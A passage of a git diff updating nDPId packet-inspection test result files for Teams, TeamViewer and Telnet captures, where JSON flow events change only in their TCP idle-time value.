-00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1587041676612,"flow_last_seen":1587041676808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8429,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1587041685251,"flow_last_seen":1587041685681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10159,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041686889,"flow_last_seen":1587041687253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10175,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041690916,"flow_last_seen":1587041691089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041697061,"flow_last_seen":1587041697244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8968,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041690916,"flow_last_seen":1587041691089,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041697061,"flow_last_seen":1587041697244,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8968,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","packets-captured":2817,"packets-processed":2775,"total-skipped-flows":0,"total-l4-data-len":1327851,"total-not-detected-flows":1,"total-guessed-flows":4,"total-detected-flows":78,"total-detection-updates":50,"total-updates":0,"current-active-flows":0,"total-active-flows":83,"total-idle-flows":83,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":597,"global_ts_msec":1587041698021} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/teamviewer.pcap.out b/test/results/teamviewer.pcap.out index d7e8e6991..58dfae90b 100644 --- a/test/results/teamviewer.pcap.out +++ b/test/results/teamviewer.pcap.out @@ -1,9 +1,9 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"teamviewer.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":330297,"flow_last_seen":330297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":330297,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":330297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":330297,"pkt":"UlQAEjUCCAAns+YuCABFAAA8OlxAAEAGTq0KAAIPovoCqouUFzIpaMgpAAAAAKAC+vCAjgAAAgQFtAQCCAosLVpIAAAAAAEDAwc="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":330433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":330433,"pkt":"CAAns+YuUlQAEjUCCABFAAAsCdUAAEAGv0Si+gKqCgACDxcyi5QCaioBKWjIKmAS\/\/8lnwAAAgQFtA=="} -00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":330434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":330434,"pkt":"UlQAEjUCCAAns+YuCABFAAAoOl1AAEAGTsAKAAIPovoCqouUFzIpaMgqAmoqAlAQ+vBCawAAAAAAAAAA"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":330297,"flow_last_seen":330434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":330434,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":330297,"flow_last_seen":330297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":330297,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":330297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":330297,"pkt":"UlQAEjUCCAAns+YuCABFAAA8OlxAAEAGTq0KAAIPovoCqouUFzIpaMgpAAAAAKAC+vCAjgAAAgQFtAQCCAosLVpIAAAAAAEDAwc="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":330433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":330433,"pkt":"CAAns+YuUlQAEjUCCABFAAAsCdUAAEAGv0Si+gKqCgACDxcyi5QCaioBKWjIKmAS\/\/8lnwAAAgQFtA=="} +00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":330434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":330434,"pkt":"UlQAEjUCCAAns+YuCABFAAAoOl1AAEAGTsAKAAIPovoCqouUFzIpaMgqAmoqAlAQ+vBCawAAAAAAAAAA"} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":330297,"flow_last_seen":330434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":330434,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":520136,"flow_last_seen":520136,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":520136,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":520136,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":520136,"pkt":"UlQAEjUCCAAns+YuCABFAAB8z5cAAEARYKoKAAIPXS\/g8YZxjMUAaPehAAAAAAAAAAAAAAMXJEdQAAUAAAAAAAAAAAAAADkzLjQ3LjIyNC4yNDEAAADFjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":520148,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":520148,"pkt":"CAAns+YuUlQAEjUCCABFAAB8FPQAAEARG05dL+DxCgACD4zFhnEAaPihAAAAAAAAAAAAAAMXJEdQAAUAAAAAAAAAAAAAADkzLjQ3LjIyNC4yNDEAAADEjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} @@ -11,7 +11,7 @@ 00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":520136,"flow_last_seen":520160,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":420,"midstream":0,"thread_ts_msec":520160,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1283,"source":"teamviewer.pcap","alias":"nDPId-test","packets-captured":1283,"packets-processed":1282,"total-skipped-flows":0,"total-l4-data-len":643545,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":633881} 00940{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1009,"flow_first_seen":520136,"flow_last_seen":558067,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":520494,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":330297,"flow_last_seen":729854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":125458,"flow_avg_l4_payload_len":434,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":289,"flow_first_seen":330297,"flow_last_seen":729854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":125458,"flow_avg_l4_payload_len":434,"midstream":0,"thread_ts_msec":729854,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1298,"source":"teamviewer.pcap","alias":"nDPId-test","packets-captured":1298,"packets-processed":1298,"total-skipped-flows":0,"total-l4-data-len":645952,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":729854} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1298/1298 diff --git a/test/results/telnet.pcap.out b/test/results/telnet.pcap.out index 99c8f805e..aa9a18d87 100644 --- a/test/results/telnet.pcap.out +++ b/test/results/telnet.pcap.out @@ -1,24 +1,24 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"telnet.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":943755158387} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":943755158387,"flow_last_seen":943755158387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":943755158387,"l3_proto":"ip4","src_ip":"192.168.0.2","dst_ip":"192.168.0.1","src_port":1550,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"telnet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":943755158387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":943755158387,"pkt":"AADAn6CXAKDMO7\/6CABFEAA8RjxAAEAGcxzAqAACwKgAAQYOABeZxaDsAAAAAKACfXjgowAAAgQFtAQCCAoAnCckAAAAAAEDAwA="} 